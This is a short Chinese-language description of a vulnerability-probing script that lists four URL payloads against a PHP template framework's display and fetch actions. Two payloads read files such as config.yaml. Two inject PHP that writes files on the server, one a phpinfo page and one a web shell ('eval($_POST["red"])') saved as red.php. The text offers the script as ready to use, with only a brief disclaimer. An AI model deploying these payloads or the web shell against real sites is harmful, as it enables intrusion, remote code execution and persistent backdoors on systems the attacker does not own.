探测以下4个payload:
?a=display&templateFile=README.md
?a=display&templateFile=config.yaml
?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('test.php','<?php phpinfo();?>')</php>
?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('red.php','by:zjun <?php eval($_POST["red"]);?>')</php>
此脚本只用了requests和argparse库完成,因此可以即下即用.
该脚本具有一定误差,请谨慎使用,仅供参考!